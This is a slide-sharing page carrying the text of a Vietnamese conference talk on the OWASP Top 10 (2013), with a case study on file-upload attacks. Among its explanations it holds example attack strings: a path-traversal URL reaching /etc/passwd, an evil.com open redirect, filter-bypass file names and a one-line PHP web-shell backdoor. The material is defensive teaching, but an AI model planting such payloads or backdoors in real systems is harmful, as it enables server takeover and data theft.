PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018
PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018Security Bootcamp
 
Lannguyen-Detecting Cyber Attacks
Lannguyen-Detecting Cyber AttacksLannguyen-Detecting Cyber Attacks
Lannguyen-Detecting Cyber AttacksSecurity Bootcamp
 
Letrungnghia-gopyluananm2018
Letrungnghia-gopyluananm2018Letrungnghia-gopyluananm2018
Letrungnghia-gopyluananm2018Security Bootcamp
 

More from Security Bootcamp (20)

Ransomware is Knocking your Door_Final.pdf
Ransomware is Knocking your Door_Final.pdfRansomware is Knocking your Door_Final.pdf
Ransomware is Knocking your Door_Final.pdf
 
Hieupc-The role of psychology in enhancing cybersecurity
Hieupc-The role of psychology in enhancing cybersecurityHieupc-The role of psychology in enhancing cybersecurity
Hieupc-The role of psychology in enhancing cybersecurity
 
Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s view
Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s viewNguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s view
Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s view
 
Sbc 2020 bao gio vn co anm dua vao cong nghe mo
Sbc 2020 bao gio vn co anm dua vao cong nghe moSbc 2020 bao gio vn co anm dua vao cong nghe mo
Sbc 2020 bao gio vn co anm dua vao cong nghe mo
 
Deception change-the-game
Deception change-the-gameDeception change-the-game
Deception change-the-game
 
Giam sat thu dong thong tin an toan hang hai su dung sdr
Giam sat thu dong thong tin an toan hang hai su dung sdrGiam sat thu dong thong tin an toan hang hai su dung sdr
Giam sat thu dong thong tin an toan hang hai su dung sdr
 
Sbc2019 luong-cyber startup
Sbc2019 luong-cyber startupSbc2019 luong-cyber startup
Sbc2019 luong-cyber startup
 
Insider threat-what-us-do d-want
Insider threat-what-us-do d-wantInsider threat-what-us-do d-want
Insider threat-what-us-do d-want
 
Macro malware common techniques - public
Macro malware   common techniques - publicMacro malware   common techniques - public
Macro malware common techniques - public
 
Malware detection-using-machine-learning
Malware detection-using-machine-learningMalware detection-using-machine-learning
Malware detection-using-machine-learning
 
Tim dieu moi trong nhung dieu cu
Tim dieu moi trong nhung dieu cuTim dieu moi trong nhung dieu cu
Tim dieu moi trong nhung dieu cu
 
Threat detection with 0 cost
Threat detection with 0 costThreat detection with 0 cost
Threat detection with 0 cost
 
Build SOC
Build SOC Build SOC
Build SOC
 
AD red vs blue
AD red vs blueAD red vs blue
AD red vs blue
 
Securitybox
SecurityboxSecuritybox
Securitybox
 
GOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active Directory
GOLDEN TICKET -  Hiểm hoa tiềm ẩn trong hệ thống Active DirectoryGOLDEN TICKET -  Hiểm hoa tiềm ẩn trong hệ thống Active Directory
GOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active Directory
 
PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018
PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018
PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018
 
Api security-present
Api security-presentApi security-present
Api security-present
 
Lannguyen-Detecting Cyber Attacks
Lannguyen-Detecting Cyber AttacksLannguyen-Detecting Cyber Attacks
Lannguyen-Detecting Cyber Attacks
 
Letrungnghia-gopyluananm2018
Letrungnghia-gopyluananm2018Letrungnghia-gopyluananm2018
Letrungnghia-gopyluananm2018
 

Security Bootcamp 2013 owasp top 10- 2013

  • 1. TỔNG QUAN VỀ OWASP TOP 10- 2013 Trình bày: Khổng Văn Cường Email: cuongkv@fpt.com.vn
  • 2. Đơn vị tổ chức: Đơn vị tài trợ:
  • 3. Nội dung • Hiện trạng • Giải pháp • Giới thiệu tổng quan về PENTEST và chuẩn OWASP TOP 10 phiên bản 2013. • Các nhóm lỗi trong OWASP TOP 10 phiên bản 2013. • Case Study : File Upload 10/23/2013 9:57 AM www.securitybootcamp.vn
  • 4. Hiện trạng 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 5. Hiện trạng 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 6. BẠN THẬT SỰ ĐÃ ĐƯỢC BẢO VỆ? 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 7. BẠN THẬT SỰ ĐÃ ĐƯỢC BẢO VỆ? 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 8. BẠN THẬT SỰ ĐÃ ĐƯỢC BẢO VỆ? 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 9. BẠN THẬT SỰ ĐÃ ĐƯỢC BẢO VỆ? 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 12. Tổng Quan Về PENTEST • Pentest là gì ? • Các phương pháp sử dụng trong pentest: – Hộp đen (Black box) – Hộp trắng (White box) – Hộp xám (Gray box) 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 13. Tổng Quan Về PENTEST • Phạm vi trong Pentest ? – Network Penetration Test – Web Application Penetration Test – Wireless Network Penetration Test – Physical Penetration Test • 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 14. Tổng Quan Về PENTEST • Tiêu chuẩn để thực hiện Pentest là gì? – Đánh giá ứng dụng Web – OWASP (Opensource Web Application Security Project) 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 15. Tổng Quan Về PENTEST • Tiêu chuẩn để thực hiện Pentest là gì? – Đánh giá ứng dụng Web – OWASP (Opensource Web Application Security Project) – Đánh giá mạng và hệ thống – OSSTMM (Open Source Security Testing Methodology Manual) 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 16. OWASP là gì? Ở OWASP bạn sẽ được cung cấp miễn phí và mở : • Các công cụ và các tiêu chuẩn về an toàn thông tin • Tài liệu về kiểm tra bảo mật ứng dụng, lập trình an toàn và kiểm định mã nguồn • Thư viện và các tiêu chuẩn điều khiển an ninh thông tin • Các chi nhánh của hội ở khắp thế giới • Các nghiên cứu mới nhất • Các buổi hội thảo toàn cầu • Maillist chung 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 17. OWASP TOP 10 phiên bản 2013 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 18. A1: Injection • Nguyên nhân: Các truy vấn đầu vào tại ứng dụng bị chèn thêm dữ liệu không an toàn dẫn đến mã lệnh được gởi tới máy chủ cơ sở dữ liệu. 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 19. A1: Injection • Nguyên nhân: Các truy vấn đầu vào tại ứng dụng bị chèn thêm dữ liệu không an toàn dẫn đến mã lệnh được gởi tới máy chủ cơ sở dữ liệu. 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 20. A1: Injection • Nguy cơ: – Truy cập dữ liệu bất hợp pháp. – Insert/update dữ liệu vào DB. – Thực hiện một số tấn công từ chối dịch vụ (refref, benchmark …) 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 21. DEMO Demo SQL Injection 10/23/2013 10:18 AM www.securitybootcamp.vn
  • 22. A2: Broken Authentication and Session Management • Điểm yếu: Cho phép hacker từ bên ngoài có thể truy cập vào những tài nguyên nội bộ trái phép (admin page, inside, control page …) 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 23. A2: Broken Authentication and Session Management • Điểm yếu: Cho phép hacker từ bên ngoài có thể truy cập vào những tài nguyên nội bộ trái phép (admin page, inside, control page …) • Ngoài ra hacker còn có thể thực hiện các hành vi nâng quyền quản trị hoặc tấn công dựa vào các dạng như session fixation … 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 24. A3: Cross-Site Scripting(XSS) • Điểm yếu: Cho phép thực thi mã độc tại máy nạn nhân (client side) • Nguy cơ: – Đánh cắp cookie/session – Phát tán mã độc 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 25. A3: Cross-Site Scripting(XSS) [7] Sign in with victim’s token [1] POST Internet Attacker [2] RESPONE [3] Invite malicious code via Friendlist [6] DataBase Web server App. server www.server.com Internet [4] http://www.server.com/XSS WebApp vulnerabile al XSS user [6] Conect back Attacker [5] RESPONE: execute javascript function 24
  • 26. A4: Insecure Direct Object References • Điểm yếu: Việc phân quyền yếu (weak authorization) cho phép người dùng có thể truy cập dữ liệu của người dùng khác. Trong những trường hợp hacker có thể xác định được chính xác cấu trúc truy vấn gởi đến server, hacker có thể nhanh chóng thu thập dữ liệu như Credit Card, mã khách hàng, thông tin cá nhân... 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 27. A4: Insecure Direct Object References http://www.server.com/app/accountInfo?acct=notmyacct http://www.server.com/app/download.php?file=../../../../etc/passwd [1] Request Internet Attacker [2] Respone App. server 26
  • 28. A5: Security Misconfiguration • Việc thắt chặt các cấu hình bảo mật tại các tầng trong kiến trúc web là cần thiết: platform, OS, web server, database, framework... nhằm tránh những nguy cơ có thể bị khai thác vào ứng dụng. 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 29. A5: Security Misconfiguration 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 30. A6: Sensitive Data Exposure • Các dữ liệu nhạy cảm được lưu trữ không an toàn có thể gây ra những ảnh hưởng to lớn cho hệ thống máy chủ, cũng như cho khách hàng. 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 31. A6: Sensitive Data Exposure • Tình huống 1: Thẻ tín dụng/Tài khoản đăng nhập được lưu trữ cleartext. 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 32. A6: Sensitive Data Exposure • Tình huống 1: Thẻ tín dụng/Tài khoản đăng nhập được lưu trữ cleartext. • Tình huống 2: Kênh truyền HTTPS bị hacker nghe lén và dữ liệu được giải mã thông qua lỗ hổng CRIME 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 33. A7: Missing Function Level Access Control http://admin.server.com/ 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 34. A7: Missing Function Level Access Control http://admin.server.com/admin.php 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 35. A8: Cross-Site Request Forgery • Với những hệ thống thanh toán không kiểm tra tính hợp lệ của token/Session/Domain... thì nguy cơ người dùng bị mất tiền do bị lừa thực hiện các mã kịch bản không mong muốn từ các site lừa đảo. 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 36. A8: Cross-Site Request Forgery http://www.server.com/app/checkout.php? merchantid=10&customer=541&amount=500&currentcy=us [1] Request Victim Internet [3] Respone App. server [4] Respone + merchantid=10&custom Request er=606&amount=500&cu [2] Request rrentcy=us 35
  • 37. A9: Using Components with Known Vulnerabilities • Điểm yếu: Việc sử dụng các lỗ hổng bảo mật trong các thư viện, plugin, module, ứng dụng... được công khai trong cộng đồng giúp hacker nhanh chóng khai thác các lỗ hổng bảo mật. 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 38. A9: Using Components with Known Vulnerabilities 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 39. A9: Using Components with Known Vulnerabilities 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 40. A9: Using Components with Known Vulnerabilities 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 41. A9: Using Components with Known Vulnerabilities • Khuyến cáo: Các bản vá bảo mật từ nhà phát triển ứng dụng sẽ giúp ứng dụng giảm thiểu các rủi ro khai thác. 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 42. A10: Unvalidated Redirects and Forwards • Việc chuyển hướng không an toàn người dùng đến một đường dẫn bên ngoài trang có thể tạo nguy cơ người dùng truy cập đến những trang chứa mã độc nhằm đánh cắp dữ liệu cá nhân. 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 43. A10: Unvalidated Redirects and Forwards http://www.server.com/app/redirect.php?url=http://www.evil.com/malicious.htm [2] Request Victim Internet [3] Respone App. server [4] http://www.ev il.com/malicio us.html [1] Send URL to victim Attacker 42
  • 44. Tổng Kết 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 45. Tổng kết 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 46. DEMO Demo Business Logic Testing 10/23/2013 10:27 AM www.securitybootcamp.vn
  • 47. Case Study : File Upload • Protection bằng Content-Type • Có thể dễ dàng thay đổi “Content-Type” 10/23/2013 10:01 AM www.securitybootcamp.vn
  • 48. 1. Name and Extension • File Extension in “test.php.jpg”? “.php.jpg”? “.jpg” 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 49. Bỏ qua Extensions • Kiểm tra thực thi extensions: • “.php” thường bị khóa, vậy “.php3”, “.php4”, “.phtml”, thì như thế nào? • Tương tự cho “.asp” thường bị khóa  “.asa” or “.cer” thì sao? • Còn client side extensions thì sao? .htm, .html, .swf, .jar, …? 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 50. 2. Double Extensions • Cấu hình trong Apache – “file.php.jpg” served chạy PHP – “AddHandler application/x-httpd-php .php” • Cấu hình trong IIS 6 thì: – “file.asp;.jpg”  Chạy file ASP – “/folder.asp/file.txt”  Chạy file ASP 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 51. DEMO Demo Remote Code Execution On Nginx Server 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 52. 3. Case Sensitive Rules • Ví dụ: – Blacklist RegEx: “^.php$” • “file.php” != “file.PhP” – “file.php3.jpg” != “file.PHP3.JpG” 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 53. 4. Windows 8.3 • Ghi đè các file nhạy cảm như: – “web.config” == “WEB~1.con” – “default.aspx” == “DEFAUL~1.asp” • Trường hợp không extensions thì có cho phép? – “.htaccess” == “HTACCE~1” 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 54. 5. Windows File System • Cuối tập tin thường bị bỏ qua: – Ví dụ dấu chấm và ký tự space • “test.asp … . .. .” == “test.asp” – Hoặc file: • “test.php<>” == “test.php” 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 55. 5. Windows File System • NTFS Alternate Data Streams: – “file.asp::$data” == “file.asp” – “/folder:$i30:$Index_allocation” == “/folder” – “.htaccess:.jpg”  make empty “.htaccess” == “HTACCE~1” … 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 56. 6. File Type Detector Issues • Trường hợp Height/Width của file image? • Ví dụ: Comments trong file jpeg: 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 57. 7. Null Character • “file.php%00.jpg” 10/23/2013 9:56 AM www.securitybootcamp.vn
  • 58. 8. Compression (Image) Issues Việc nén file .png có thể chứa code php PNG Image 10/23/2013 11:06 AM Compression www.securitybootcamp.vn PNG with PHP code!
  • 59. 8. GZIP Compression  PHP Code • Dữ liệu Text … - Nén Gzip • Chúng ta có PHP backdoor: – <?=$_GET[0]($_POST[1]);?> 10/23/2013 11:15 AM www.securitybootcamp.vn
  • 60. DEMO DEMO RISKY FUNCTIONALITY FILE UPLOADS 10/23/2013 10:10 AM www.securitybootcamp.vn
  • 61. Thank You! & Question 10/23/2013 9:56 AM www.securitybootcamp.vn